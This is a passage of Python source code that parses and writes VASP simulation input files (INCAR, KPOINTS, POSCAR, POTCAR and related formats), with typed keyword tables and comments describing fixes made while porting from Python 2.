    Returns '' for an empty array (previously raised IndexError on arr[0]).
    """
    if len(arr)==0:
        return ''
    #end if
    # run-length encode: ordered list of (value, count)
    value_counts = []
    count = 0
    value = arr[0]
    for v in arr:
        if same(v,value):
            count += 1
        else:
            value_counts.append((value,count))
            value = v
            count = 1
        #end if
    #end for
    # close the final run; the old post-loop else-branch was unreachable
    # because 'value' always tracks the last element seen
    value_counts.append((value,count))
    s = ''
    for value,count in value_counts:
        if count>max_repeat:
            s += '{0}*{1} '.format(count,render(value))
        else:
            # xrange was Python-2 only; range behaves the same here
            for i in range(count):
                s += render(value)+' '
            #end for
        #end if
    #end for
    return s
#end def write_array

def write_int_array(a):
    """Write an integer array field."""
    return write_array(a)
#end def write_int_array

def write_real_array(a):
    """Write a real array field, using approximate equality for run detection."""
    return write_array(a,same=real_equality)
#end def write_real_array

def write_bool_array(a):
    """Write a logical array field rendered as T/F tokens."""
    return write_array(a,render=render_bool)
#end def write_bool_array
# accepted inputs for logical keyword assignment; since True == 1 and
# False == 0 hash identically, this literal collapses to
# {True: True, False: False} — lookups with 0/1 still succeed via equality
assign_bool_map = {True:True,False:False,1:True,0:False}
def assign_bool(v):
    # raises KeyError for anything other than a bool or 0/1
    return assign_bool_map[v]
#end def assign_bool
def assign_string(v):
    """Validate that v is a string and return it unchanged."""
    if not isinstance(v,str):
        raise ValueError('value must be a string')
    #end if
    return v
#end def assign_string
def assign_int_array(a):
    """Coerce a tuple/list/ndarray into an integer numpy array."""
    if not isinstance(a,(tuple,list,ndarray)):
        raise ValueError('value must be a tuple, list, or array')
    #end if
    return array(a,dtype=int)
#end def assign_int_array
def assign_real_array(a):
    """Coerce a tuple/list/ndarray into a float numpy array."""
    if not isinstance(a,(tuple,list,ndarray)):
        raise ValueError('value must be a tuple, list, or array')
    #end if
    return array(a,dtype=float)
#end def assign_real_array
def assign_bool_array(a):
    """Coerce a tuple/list/ndarray into a boolean numpy array."""
    if not isinstance(a,(tuple,list,ndarray)):
        raise ValueError('value must be a tuple, list, or array')
    #end if
    return array(a,dtype=bool)
#end def assign_bool_array
# Dispatch tables keyed by keyword-category name (see VKeywordFile.kw_scalars
# and kw_arrays).  'obj' is the project's attribute-accessible dict container.
read_value_functions = obj(
    ints        = read_int,
    reals       = read_real,
    bools       = read_bool,
    strings     = read_string,
    int_arrays  = read_int_array,
    real_arrays = read_real_array,
    bool_arrays = read_bool_array
    )
write_value_functions = obj(
    ints        = write_int,
    reals       = write_real,
    bools       = write_bool,
    strings     = write_string,
    int_arrays  = write_int_array,
    real_arrays = write_real_array,
    bool_arrays = write_bool_array
    )
# assignment (user input) coercion; scalars reuse the builtin constructors
assign_value_functions = obj(
    ints        = int,
    reals       = float,
    bools       = assign_bool,
    strings     = assign_string,
    int_arrays  = assign_int_array,
    real_arrays = assign_real_array,
    bool_arrays = assign_bool_array
    )
class VFile(DevBase):
    """Base class for VASP file abstractions.

    Handles filesystem interaction; subclasses implement read_text/write_text
    to parse and render the file contents.
    """
    def __init__(self,filepath=None):
        """Optionally load contents from filepath on construction."""
        if filepath is not None:  # 'filepath!=None' replaced by identity test
            self.read(filepath)
        #end if
    #end def __init__

    def read(self,filepath):
        """Read filepath, parse it via read_text, and return the raw text."""
        if not os.path.exists(filepath):
            self.error('file {0} does not exist'.format(filepath))
        #end if
        # context manager closes the handle even if parsing raises
        # (previously open(...).read() leaked the file object)
        with open(filepath,'r') as fobj:
            text = fobj.read()
        #end with
        self.read_text(text,filepath)
        return text
    #end def read

    def write(self,filepath=None):
        """Render contents via write_text; also write to filepath if given.

        Returns the rendered text.
        """
        text = self.write_text(filepath)
        if filepath is not None:
            with open(filepath,'w') as fobj:
                fobj.write(text)
            #end with
        #end if
        return text
    #end def write

    def read_text(self,text,filepath=''):
        # abstract: subclasses parse text into attributes
        self.not_implemented()
    #end def read_text

    def write_text(self,filepath=''):
        # abstract: subclasses render attributes into file text
        self.not_implemented()
    #end def write_text

    def remove_comment(self,line):
        """Strip a trailing '!' or '#' comment (whichever starts first)."""
        cloc1 = line.find('!')
        cloc2 = line.find('#')
        has1 = cloc1!=-1
        has2 = cloc2!=-1
        if has1 or has2:
            if has1 and has2:
                cloc = min(cloc1,cloc2)
            elif has1:
                cloc = cloc1
            else:
                cloc = cloc2
            #end if
            line = line[:cloc].strip()
        #end if
        return line
    #end def remove_comment
#end class VFile
class VKeywordFile(VFile):
    """Keyword ('NAME = value') style VASP file, e.g. the INCAR.

    Subclasses declare keyword names in the class-level sets listed in
    kw_fields; class_init() compiles those declarations into per-keyword
    read/write/assign dispatch tables.
    """
    # typed keyword categories a subclass may populate
    kw_scalars = ['ints','reals','bools','strings']
    kw_arrays  = ['int_arrays','real_arrays','bool_arrays']
    kw_fields  = kw_scalars + kw_arrays + ['keywords','unsupported']

    @classmethod
    def class_init(cls):
        """Compile keyword declarations into lookup/dispatch tables."""
        for kw_field in cls.kw_fields:
            if not kw_field in cls.__dict__:
                # cls.__dict__ is a read-only mapping proxy on new-style
                # classes, so the previous 'cls.__dict__[kw_field] = set()'
                # raised TypeError; setattr stores the default portably.
                setattr(cls, kw_field, set())
            #end if
        #end for
        #cls.check_consistency()
        cls.scalar_keywords = set()
        for scalar_field in cls.kw_scalars:
            cls.scalar_keywords |= cls.__dict__[scalar_field]
        #end for
        cls.array_keywords = set()
        for array_field in cls.kw_arrays:
            cls.array_keywords |= cls.__dict__[array_field]
        #end for
        cls.keywords = cls.scalar_keywords | cls.array_keywords
        cls.type = obj()
        cls.read_value = obj()
        cls.write_value = obj()
        cls.assign_value = obj()
        for type in cls.kw_scalars + cls.kw_arrays:
            for name in cls.__dict__[type]:
                cls.type[name] = type
                cls.read_value[name] = read_value_functions[type]
                cls.write_value[name] = write_value_functions[type]
                cls.assign_value[name] = assign_value_functions[type]
            #end for
        #end for
    #end def class_init

    @classmethod
    def check_consistency(cls):
        """Verify every declared keyword belongs to exactly one type category."""
        fail = False
        msg = ''
        types = cls.kw_scalars+cls.kw_arrays
        # copy first: the augmented '-=' below is in-place for sets and
        # previously mutated cls.keywords itself
        untyped = set(cls.keywords)
        for type in types:
            untyped -= cls.__dict__[type]
        #end for
        if len(untyped)>0:
            fail = True
            msg += 'variables without a type: {0}\n'.format(sorted(untyped))
        #end if
        for type in types:
            unknown = cls.__dict__[type]-cls.keywords
            if len(unknown)>0:
                fail = True
                msg += 'unknown {0}: {1}\n'.format(type,sorted(unknown))
            #end if
        #end for
        if fail:
            cls.class_error(msg)
        #end if
    #end def check_consistency

    def read_text(self,text,filepath=''):
        """Parse 'name = value' pairs (';'-separated, backslash-continued)."""
        lines = text.splitlines()
        expression = None
        continued = False
        for line in lines:
            ls = line.strip()
            # skip blank lines and full-line comments
            if len(ls)>0 and ls[0]!='!' and ls[0]!='#':
                ls = self.remove_comment(ls)
                this_cont = ls.endswith('\\')
                if this_cont:
                    ls = ls.rstrip('\\')
                    if continued:
                        expression += ls
                    else:
                        expression = ls
                        continued = True
                    #end if
                elif continued:
                    expression += ls
                    continued = False
                else:
                    expression = ls
                #end if
                if not continued:
                    tokens = expression.split(';')
                    for token in tokens:
                        if '=' in token:
                            name,value = token.split('=',1)
                            name = name.lower().strip()
                            value = value.strip()
                            if name in self.keywords:
                                try:
                                    value = self.read_value[name](value)
                                    self[name] = value
                                # 'except Exception,e' was Python-2-only syntax
                                except Exception as e:
                                    self.error('read failed for keyword {0}\nkeyword type: {1}\ninput text: {2}\nexception:\n{3}'.format(name,self.type[name],token,e))
                                #end try
                            elif name in self.unsupported:
                                self.warn('keyword {0} is not currently supported'.format(name))
                            else:
                                #ci(lcs(),gs())
                                self.error('{0} is not a keyword for the {1} file'.format(name.upper(),self.__class__.__name__.upper()))
                            #end if
                        #end if
                    #end for
                #end if
            #end if
        #end for
    #end def read_text

    def write_text(self,filepath=''):
        """Render stored keywords as aligned 'NAME = value' lines, sorted by name."""
        text = ''
        maxlen = 0
        for name in self.keys():
            maxlen = max(maxlen,len(name))
        #end for
        valfmt = '{0:<'+str(maxlen)+'} = {1}\n'
        for name in sorted(self.keys()):
            value = self[name]
            try:
                svalue = self.write_value[name](value)
            except Exception as e:
                self.error('write failed for file {0} keyword {1}\nkeyword type: {2}\nvalue: {3}\nexception:\n{4}'.format(filepath,name,self.type[name],value,e))
            #end try
            text += valfmt.format(name.upper(),svalue)
        #end for
        return text
    #end def write_text

    def assign(self,**values):
        """Assign keyword values with per-keyword validation/coercion."""
        for name,value in values.items():  # iteritems() was Python-2-only
            try:
                self[name] = self.assign_value[name](value)
            except Exception as e:
                self.error('assign failed for keyword {0}\nkeyword type: {1}\nvalue: {2}\nexception:\n{3}'.format(name,self.type[name],value,e))
            #end try
        #end for
    #end def assign
#end class VKeywordFile
class VFormattedFile(VFile):
    """Base class for VASP files with positional (non-keyword) formatting."""

    def read_lines(self,text,remove_empty=False):
        """Split text into comment-stripped lines; optionally drop empty ones."""
        lines = []
        for line in text.splitlines():
            ls = self.remove_comment(line).strip()
            if not remove_empty or len(ls)>0:
                lines.append(ls)
            #end if
        #end for
        return lines
    #end def read_lines

    def join(self,lines,first_line,last_line):
        """Join lines[first_line..last_line] (inclusive) with single spaces."""
        joined = ''
        # xrange was Python-2 only; range is equivalent here
        for iline in range(first_line,last_line):
            joined += lines[iline]+' '
        #end for
        return joined + lines[last_line]
    #end def join

    def is_empty(self,lines,start=None,end=None):
        """True if every line in lines[start:end] is empty (default: all lines)."""
        if start is None:
            start = 0
        #end if
        if end is None:
            end = len(lines)
        #end if
        return all(len(line)==0 for line in lines[start:end])
    #end def is_empty
#end class VFormattedFile
class Incar(VKeywordFile):
    """INCAR input file: typed VASP calculation keywords.

    The sets below partition the known keywords by value type; class_init
    (defined on VKeywordFile) uses them to build read/write/assign
    converters for each keyword.
    """
    keywords = set('''
        addgrid aexx aggac aggax aldac algo amin amix amix_mag andersen_prob apaco
        bmix bmix_mag
        clnt cln cll clz cmbj cshift
        deper dimer_dist dipol dq
        ebreak eint ediff ediffg efield efield_pead elmin emax emin enaug encut
        encutfock encutgw encutgwsoft enmax enmin epsilon evenonly evenonlygw
        ferdo ferwe findiff
        gga gga_compat
        hfscreen hflmaxf hills_bin hills_h hills_w
        ialgo iband ibrion icharg ichibare i_constrained_m icorelevel idipol
        igpar images imix increm inimix iniwav ipead isif ismear ispin istart
        isym ivdw iwavpr
        kblock kgamma kpar kpuse kspacing
        lambda langevin_gamma langevin_gamma_l lasph lasync lattice_constraints
        lberry lblueout lcalceps lcalcpol lcharg lchimag lcorr ldau ldauj ldaul
        ldauprint ldautype ldauu ldiag ldipol lefg lelf lepsilon lhfcalc lhyperfine
        lkproj lmaxfock lmaxfockae lmaxfockmp2 lmaxmix lmaxmp2 lmaxpaw lmaxtau
        lmixtau lmono lnabla lnmr_sym_red lnoncollinear loptics lorbit lpard
        lpead lplane lreal lrpa lscalapack lscaler0 lscalu lscsgrad lselfenergy
        lsepb lsepk lspectral lsorbit lthomas luse_vdw lvdw lvdw_ewald lvdwscs
        lvhar lvtot lwave
        magmom maxmem maxmix mbja mbjb m_constr mdalgo metagga minrot mixpre
        nbands nbandsgw nblk nblock nbmod ncore nedos nelect nelm nelmdl nelmin
        nfree ngx ngxf ngy ngyf ngz ngzf nkred nkredx nkredy nkredz nlspline
        nmaxfockae nomega nomegar npaco npar nppstr nsim nsw nsubsys nupdown
        nwrite
        oddonly oddonlygw ofield_a ofield_kappa ofield_q6_far ofield_q6_near
        omegamax omegamin omegatl
        param1 param2 pmass pomass potim prec precfock pstress psubsys
        random_seed ropt rwigs
        saxis scsrad shakemaxiter shaketol sigma skip_edotp smass spring step_max
        step_size symprec system
        tebeg teend time tsubsys
        value_max value_min vdw_a1 vdw_a2 vdw_alpha vdw_cnradius vdw_c6 vdw_c6au
        vdw_d vdw_radius vdw_r0 vdw_r0au vdw_scaling vdw_sr vdw_s6 vdw_s8 voskown
        wc weimin
        zab_vdw zval
        '''.split()) # only used to check consistency of typed names below
    # some of these are mixed type arrays or other oddly formatted fields
    unsupported = set('quad_efg'.split())
    ints = set('''
        apaco
        clnt cln cll clz
        elmin
        findiff
        hflmaxf hills_bin
        ialgo ibrion icharg ichibare i_constrained_m icorelevel idipol igpar
        images imix inimix iniwav ipead isif ismear ispin istart isym ivdw iwavpr
        kblock kpar
        ldauprint ldautype lmaxfock lmaxfockae lmaxfockmp2 lmaxmix lmaxmp2
        lmaxpaw lorbit
        maxmem maxmix mdalgo mixpre
        nbands nbandsgw nblk nblock nbmod ncore nedos nelm nelmdl nelmin nfree
        ngx ngxf ngy ngyf ngz ngzf nkred nkredx nkredy nkredz nmaxfockae nomega
        nomegar npaco npar nppstr nsim nsw nupdown nwrite
        shakemaxiter smass spring
        voskown
        '''.split())
    reals = set('''
        aexx aggac aggax aldac amin amix amix_mag andersen_prob
        bmix bmix_mag
        cshift
        deper dimer_dist dq
        ebreak ediff ediffg efield emax emin enaug encut encutfock encutgw
        encutgwsoft enmax enmin epsilon
        hfscreen hills_h hills_w
        kspacing
        lambda langevin_gamma_l
        mbja mbjb minrot
        nelect
        ofield_a ofield_kappa ofield_q6_far ofield_q6_near omegamax omegamin omegatl
        param1 param2 pmass pomass potim pstress
        scsrad shaketol sigma step_max step_size symprec
        tebeg teend time
        vdw_a1 vdw_a2 vdw_cnradius vdw_d vdw_radius vdw_scaling vdw_sr vdw_s6 vdw_s8
        wc weimin
        zab_vdw zval
        '''.split())
    bools = set('''
        addgrid
        evenonly evenonlygw
        gga_compat
        lasph lasync lberry lblueout lcalceps lcalcpol lcharg lchimag lcorr
        ldau ldiag ldipol lefg lelf lepsilon lhfcalc lhyperfine lkproj lmaxtau
        lmixtau lmono lnabla lnmr_sym_red lnoncollinear loptics lpard lpead
        lplane lrpa lscalapack lscaler0 lscalu lscsgrad lselfenergy lsepb
        lsepk lsorbit lspectral lthomas luse_vdw lvdw lvdw_ewald lvdwscs lvhar
        lvtot lwave
        kgamma
        nlspline
        oddonly oddonlygw
        skip_edotp
        '''.split())
    strings = set('''
        algo
        gga
        lreal
        metagga
        prec precfock
        system
        '''.split())
    int_arrays = set('''
        iband
        kpuse
        ldaul
        nsubsys
        random_seed
        '''.split())
    real_arrays = set('''
        cmbj
        dipol
        efield_pead eint
        ferdo ferwe
        increm
        langevin_gamma ldauj ldauu
        magmom m_constr
        psubsys
        ropt rwigs
        saxis
        tsubsys
        value_max value_min vdw_alpha vdw_c6 vdw_c6au vdw_r0 vdw_r0au
        '''.split())
    bool_arrays = set('''
        lattice_constraints
        '''.split()) # formatted: F F T, etc
#end class Incar
class Stopcar(VKeywordFile):
    """STOPCAR input file: boolean flags requesting VASP to stop."""
    keywords = set(['lstop','labort'])
    bools    = set(['lstop','labort'])
#end class Stopcar
# build per-keyword read/write/assign converters for each keyword file class
for cls in Incar,Stopcar:
    cls.class_init()
#end for
# the kw_* staging attributes are only needed during class_init above;
# remove them from the shared base class now that all subclasses are built
del VKeywordFile.kw_scalars
del VKeywordFile.kw_arrays
del VKeywordFile.kw_fields
class Iconst(VFormattedFile): # metadynamics -> 6.62.4
    """Placeholder for the ICONST metadynamics input file (not yet parsed)."""
    # the original body was a bare 'None' expression statement, which is a
    # useless statement; a docstring is the idiomatic empty class body
#end class Iconst
class Kpoints(VFormattedFile):
    """KPOINTS input file.

    Supported layouts (self.mode):
      explicit : coord, kpoints, kweights, optional tetrahedra
      line     : coord, ninsert, endpoints (band-structure line mode)
      auto     : centering, kgrid, optional kshift
      basis    : coord, kbasis (3x3), kshift
    """
    # map of the first letter of the centering line to its full name
    centering_options = obj(a='auto',g='gamma',m='monkhorst-pack')
    def coord_options(self,cselect):
        """Map a coordinate selector character to 'cartesian'/'reciprocal'."""
        if cselect=='c' or cselect=='k':
            return 'cartesian'
        else:
            return 'reciprocal'
        #end if
    #end def coord_options
    def __init__(self,filepath=None):
        self.mode = None # explicit, line, auto, basis
        VFile.__init__(self,filepath)
    #end def __init__
    def read_text(self,text,filepath=''):
        """Parse KPOINTS file contents, setting fields according to mode."""
        lines = self.read_lines(text,remove_empty=True)
        if len(lines)>2:
            if not ' ' in lines[1]:
                iselect = int(lines[1])
            else: # erroneous case? (e.g. user supplies '0 0 0' instead of '0')
                iselect = int(lines[1].split()[0])
            #end if
            cselect = lines[2].lower()[0]
            if iselect==0: # auto or basis
                if cselect=='a': # fully auto mesh
                    self.mode      = 'auto'
                    self.centering = self.centering_options[cselect]
                    self.kgrid     = int(lines[3])
                elif cselect=='g' or cselect=='m': # gamma or monkhorst mesh
                    self.mode      = 'auto'
                    self.centering = self.centering_options[cselect]
                    self.kgrid     = array(lines[3].split(),dtype=int)
                    if len(lines)>4:
                        self.kshift = array(lines[4].split(),dtype=float)
                    else:
                        self.kshift = None
                    #end if
                else:
                    self.mode   = 'basis' # basis generated mesh
                    self.coord  = self.coord_options(cselect)
                    self.kbasis = array(self.join(lines,3,5).split(),dtype=float)
                    self.kbasis.shape = 3,3
                    self.kshift = array(lines[6].split(),dtype=float)
                #end if
            elif cselect=='l': # line mode (band structure)
                self.mode    = 'line'
                self.ninsert = iselect
                self.coord   = self.coord_options(lines[3].lower()[0])
                endpoints = []
                for line in lines[4:]:
                    endpoints.append(line.split())
                #end for
                self.endpoints = array(endpoints,dtype=float)
            else: # explicit kpoints
                self.mode  = 'explicit'
                self.coord = self.coord_options(cselect)
                nkpoints = iselect
                kpw = []
                for line in lines[3:3+nkpoints]:
                    kpw.append(line.split())
                #end for
                kpw = array(kpw,dtype=float)
                self.kpoints  = kpw[:,0:3]
                self.kweights = kpw[:,3].ravel()
                tetline = 3+nkpoints
                if len(lines)>tetline and lines[tetline].lower()[0]=='t':
                    self.tetrahedra = obj()
                    tokens = lines[tetline+1].split()
                    ntets      = int(tokens[0])
                    tet_volume = float(tokens[1])
                    for n in range(ntets):
                        tokens = lines[tetline+2+n].split()
                        self.tetrahedra.append(
                            obj(volume     = tet_volume,
                                degeneracy = int(tokens[0]),
                                corners    = array(tokens[1:],dtype=int))
                            )
                    #end for
                #end if
            #end if
        #end if
    #end def read_text
    def write_text(self,filepath=''):
        """Render the stored kpoint information as KPOINTS file text."""
        text = ''
        if self.mode=='auto':
            text+='{0} mesh\n 0\n'.format(self.centering)
            if self.centering=='auto':
                text+='auto\n'
                text+=' {0:d}\n'.format(self.kgrid)
            elif self.centering=='gamma' or self.centering=='monkhorst-pack':
                text+='{0}\n'.format(self.centering)
                text+=' {0:d} {1:d} {2:d}\n'.format(*self.kgrid)
                # use 'is not None': kshift may be a numpy array, for which
                # '!=None' is elementwise and has no single truth value
                if self.kshift is not None:
                    text+=' {0} {1} {2}\n'.format(*self.kshift)
                #end if
            else:
                self.error('invalid centering for file {0}: {1}\nvalid options are: auto, gamma, monkhorst-pack'.format(filepath,self.centering))
            #end if
        elif self.mode=='basis':
            text+='basis mesh\n 0\n'
            text+='{0}\n'.format(self.coord)
            for kb in self.kbasis:
                text+=' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*kb)
            #end for
            text+=' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*self.kshift)
        elif self.mode=='line':
            text+='kpoints along lines\n {0}\nline-mode\n'.format(self.ninsert)
            text+='{0}\n'.format(self.coord)
            npoints = len(self.endpoints)
            for n in range(npoints):
                text+=' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*self.endpoints[n])
                # blank line between endpoint pairs
                if n!=npoints-1 and n%2==1:
                    text+='\n'
                #end if
            #end for
        elif self.mode=='explicit':
            text+='explicit kpoints\n {0}\n'.format(len(self.kpoints))
            text+='{0}\n'.format(self.coord)
            for n in range(len(self.kpoints)):
                kp = self.kpoints[n]
                kw = self.kweights[n]
                text+=' {0:18.14f} {1:18.14f} {2:18.14f} {3:12.8f}\n'.format(kp[0],kp[1],kp[2],kw)
            #end for
            if 'tetrahedra' in self and len(self.tetrahedra)>0:
                ntets = len(self.tetrahedra)
                tets  = self.tetrahedra
                text+='tetrahedra\n'
                # a newline was missing here, fusing this header with the
                # first tetrahedron line
                text+=' {0} {1}\n'.format(ntets,tets[0].volume)
                for n in range(ntets):
                    t = tets[n]
                    d = t.degeneracy
                    c = t.corners
                    # a tetrahedron has 4 corner indices; the original format
                    # had only 4 slots total and silently dropped the last
                    # corner (str.format ignores extra arguments)
                    text+=' {0:d} {1:d} {2:d} {3:d} {4:d}\n'.format(d,*c)
                #end for
            #end if
        else:
            # the original never applied .format, leaving a literal '{0}'
            self.error('invalid mode: {0}\nvalid options are: auto, basis, line, explicit'.format(self.mode))
        #end if
        return text
    #end def write_text
#end class Kpoints
class Penaltypot(VFormattedFile): # metadynamics -> 6.62.4 (2nd one)
    """Placeholder for the PENALTYPOT metadynamics file (not yet parsed)."""
    # the original body was a bare 'None' expression statement (a useless
    # statement); a docstring is the idiomatic empty class body
#end class Penaltypot
class Poscar(VFormattedFile):
    """POSCAR/CONTCAR structure file.

    Fields: description, scale, axes (3x3), elem, elem_count,
    coord ('cartesian'/'direct'), pos, dynamic (selective-dynamics flags
    or None), vel_coord, vel.
    """
    # map python bools to the T/F flags used by selective dynamics
    bool_map = {True:'T',False:'F'}
    def __init__(self,filepath=None):
        self.description = None
        self.scale       = None
        self.axes        = None
        self.elem        = None
        self.elem_count  = None
        self.coord       = None
        self.pos         = None
        self.dynamic     = None
        self.vel_coord   = None
        self.vel         = None
        VFile.__init__(self,filepath)
    #end def __init__
    def read_text(self,text,filepath=''):
        """Parse POSCAR-formatted text into the fields above."""
        lines = self.read_lines(text,remove_empty=False)
        nlines = len(lines)
        min_lines = 8
        if nlines<min_lines:
            self.error('file {0} must have at least {1} lines\n only {2} lines found'.format(filepath,min_lines,nlines))
        #end if
        description = lines[0]
        dim = 3
        scale = float(lines[1].strip())
        axes = empty((dim,dim))
        axes[0] = array(lines[2].split(),dtype=float)
        axes[1] = array(lines[3].split(),dtype=float)
        axes[2] = array(lines[4].split(),dtype=float)
        # line 5 is either element symbols (VASP 5) or atom counts (VASP 4)
        tokens = lines[5].split()
        if tokens[0].isdigit():
            counts = array(tokens,dtype=int)
            elem   = None
            lcur   = 6
        else:
            elem   = array(tokens,dtype=str)
            counts = array(lines[6].split(),dtype=int)
            lcur   = 7
        #end if
        if lcur<len(lines) and len(lines[lcur])>0:
            c = lines[lcur].lower()[0]
            lcur+=1
        else:
            self.error('file {0} is incomplete (missing positions)'.format(filepath))
        #end if
        selective_dynamics = c=='s'
        if selective_dynamics: # Selective dynamics
            if lcur<len(lines) and len(lines[lcur])>0:
                c = lines[lcur].lower()[0]
                lcur+=1
            else:
                self.error('file {0} is incomplete (missing positions)'.format(filepath))
            #end if
        #end if
        cartesian = c=='c' or c=='k'
        if cartesian:
            coord = 'cartesian'
        else:
            coord = 'direct'
        #end if
        npos = counts.sum()
        if lcur+npos>len(lines):
            self.error('file {0} is incomplete (missing positions)'.format(filepath))
        #end if
        spos = []
        for i in range(npos):
            spos.append(lines[lcur+i].split())
        #end for
        lcur += npos
        spos = array(spos)
        pos  = array(spos[:,0:3],dtype=float)
        if selective_dynamics:
            # columns 3-5 hold T/F flags per coordinate
            dynamic = array(spos[:,3:6],dtype=str)
            dynamic = dynamic=='T'
        else:
            dynamic = None
        #end if
        # optional velocity block follows the positions
        if lcur<len(lines) and not self.is_empty(lines,lcur):
            cline = lines[lcur].lower()
            lcur+=1
            if lcur+npos>len(lines):
                self.error('file {0} is incomplete (missing velocities)'.format(filepath))
            #end if
            cartesian = len(cline)>0 and (cline[0]=='c' or cline[0]=='k')
            if cartesian:
                vel_coord = 'cartesian'
            else:
                vel_coord = 'direct'
            #end if
            svel = []
            for i in range(npos):
                svel.append(lines[lcur+i].split())
            #end for
            lcur += npos
            vel = array(svel,dtype=float)
        else:
            vel_coord = None
            vel = None
        #end if
        self.set(
            description = description,
            scale       = scale,
            axes        = axes,
            elem        = elem,
            elem_count  = counts,
            coord       = coord,
            pos         = pos,
            dynamic     = dynamic,
            vel_coord   = vel_coord,
            vel         = vel
            )
    #end def read_text
    def write_text(self,filepath=''):
        """Render the stored structure as POSCAR file text."""
        msg = self.check_complete(exit=False)
        if msg!='':
            self.error('incomplete data to write file {0}\n{1}'.format(filepath,msg))
        #end if
        text = ''
        if self.description is None:
            text += 'System cell and coordinates\n'
        else:
            text += self.description+'\n'
        #end if
        text += ' {0}\n'.format(self.scale)
        for a in self.axes:
            text += ' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*a)
        #end for
        # use 'is not None': elem may be a numpy string array, for which
        # '!=None' is an elementwise comparison with no single truth value
        if self.elem is not None:
            for e in self.elem:
                text += e+' '
            #end for
            text += '\n'
        #end if
        for ec in self.elem_count:
            text += ' {0}'.format(ec)
        #end for
        text += '\n'
        text += self.coord+'\n'
        if self.dynamic is None:
            for p in self.pos:
                text += ' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*p)
            #end for
        else:
            bm = self.bool_map
            for i in range(len(self.pos)):
                p = self.pos[i]
                d = self.dynamic[i]
                text += ' {0:18.14f} {1:18.14f} {2:18.14f} {3} {4} {5}\n'.format(p[0],p[1],p[2],bm[d[0]],bm[d[1]],bm[d[2]])
            #end for
        #end if
        # same reasoning: vel may be a numpy array
        if self.vel is not None:
            text += self.vel_coord+'\n'
            for v in self.vel:
                text += ' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*v)
            #end for
        #end if
        return text
    #end def write_text
    def check_complete(self,exit=True):
        """Return a message describing missing fields ('' when complete).

        Args:
            exit: if True, abort via self.error when data is missing.
        """
        msg = ''
        if self.scale is None:
            msg += 'scale is missing\n'
        #end if
        if self.axes is None:
            msg += 'axes is missing\n'
        #end if
        if self.elem_count is None:
            msg += 'elem_count is missing\n'
        #end if
        if self.coord is None:
            msg += 'coord is missing\n'
        #end if
        if self.pos is None:
            msg += 'pos is missing\n'
        #end if
        if self.vel is not None and self.vel_coord is None:
            msg += 'vel_coord is missing\n'
        #end if
        # the original called self.error even when msg was empty, aborting
        # on fully complete data; only abort when something is missing
        if exit and len(msg)>0:
            self.error(msg)
        #end if
        return msg
    #end def check_complete
#end class Poscar
class Potcar(VFormattedFile):
    """POTCAR pseudopotential file, or a directory plus list of files."""
    def __init__(self,filepath=None,files=None):
        self.files    = files
        self.filepath = filepath
        self.pseudos  = obj()
        # read only when given a path to an actual file; a directory (or no
        # path) is handled lazily via self.files.  Guard against None:
        # os.path.isdir(None) raises TypeError, so the original crashed when
        # constructed with default arguments.
        if filepath is not None and not os.path.isdir(filepath):
            VFile.__init__(self,filepath)
        else:
            VFile.__init__(self)
        #end if
    #end def __init__
    def read_text(self,text,filepath=''):
        """Split concatenated POTCAR text into individual pseudopotentials."""
        start  = 0
        end    = len(text)
        pstart = start
        pend   = end
        n      = 0
        niter  = 0 # renamed from 'iter', which shadowed the builtin
        # the iteration cap guards against malformed/unterminated files
        while n<end and niter<20:
            n = text.find('End of Dataset',start,end)
            if n==-1:
                break
            #end if
            start = n
            # advance past the end of the 'End of Dataset' line
            n = text.find('\n',start,end)+1
            pend = n
            self.pseudos.append(text[pstart:pend])
            pstart = pend
            start  = pend
            niter += 1
        #end while
        if niter>=20:
            self.error('failed to read file {0}'.format(filepath))
        #end if
    #end def read_text
    def write_text(self,filepath=''):
        """Concatenate stored (or on-disk) pseudopotentials into POTCAR text."""
        text = ''
        if len(self.pseudos)>0:
            for i in range(len(self.pseudos)):
                text += self.pseudos[i]
            #end for
        elif self.filepath is not None and self.files is not None:
            for file in self.files:
                # close file handles promptly instead of leaking them
                with open(os.path.join(self.filepath,file),'r') as fobj:
                    text += fobj.read()
                #end with
            #end for
        #end if
        return text
    #end def write_text
    def pot_info(self):
        """Extract (Zval, element) information for each pseudopotential."""
        pot_info = obj()
        if len(self.pseudos)>0:
            pots = self.pseudos
        elif self.filepath is not None and self.files is not None:
            pots = obj()
            for file in self.files:
                with open(os.path.join(self.filepath,file),'r') as fobj:
                    pots.append(fobj.read())
                #end with
            #end for
        else:
            pots = obj()
        #end if
        for i in range(len(pots)):
            pot = pots[i]
            # the second line of each dataset holds the valence charge
            n1 = pot.find('\n')
            n2 = pot.find('\n',n1+1)
            Zval = int(float(pot[n1:n2].strip()))
            # the element symbol follows 'VRHFIN =' up to ':'
            n  = pot.find('VRHFIN')
            n1 = pot.find('=',n+1)+1
            n2 = pot.find(':',n1+1)
            element = pot[n1:n2].strip()
            pot_info.append(obj(Zval=Zval,element=element))
        #end for
        return pot_info
    #end def pot_info
    def load(self):
        """(Re)load pseudopotential contents from the stored file list."""
        self.pseudos.clear()
        if self.filepath is not None and self.files is not None:
            for file in self.files:
                with open(os.path.join(self.filepath,file),'r') as fobj:
                    self.pseudos.append(fobj.read())
                #end with
            #end for
        #end if
    #end def load
#end class Potcar
class Exhcar(VFormattedFile):
    """Placeholder for the EXHCAR input file (not yet parsed)."""
    # the original body was a bare 'None' expression statement (a useless
    # statement); a docstring is the idiomatic empty class body
#end class Exhcar
class VaspInput(SimulationInput):
    """Collection of VASP input files (INCAR, KPOINTS, POSCAR, POTCAR, ...)."""
    all_inputs = '''
      EXHCAR   ICONST   INCAR    KPOINTS  PENALTYPOT POSCAR   POTCAR
      STOPCAR  WAVEDER
      '''.split()
    all_outputs = '''
      CHG      CHGCAR   CONTCAR  DOSCAR   ELFCAR     EIGENVAL HILLSPOT
      IBZKPT   LOCPOT   OSZICAR  OUTCAR   PCDAT      PRJCAR
      PROCAR   PROOUT   REPORT   TMPCAR   WAVECAR    XDATCAR  vasprun.xml
      '''.split()# note that CHGCAR, TMPCAR, and WAVECAR sometimes contain input
    input_files = obj(
        #exhcar     = Exhcar,
        #iconst     = Iconst,
        incar      = Incar,
        kpoints    = Kpoints,
        #penaltypot = Penaltypot,
        poscar     = Poscar,
        potcar     = Potcar,
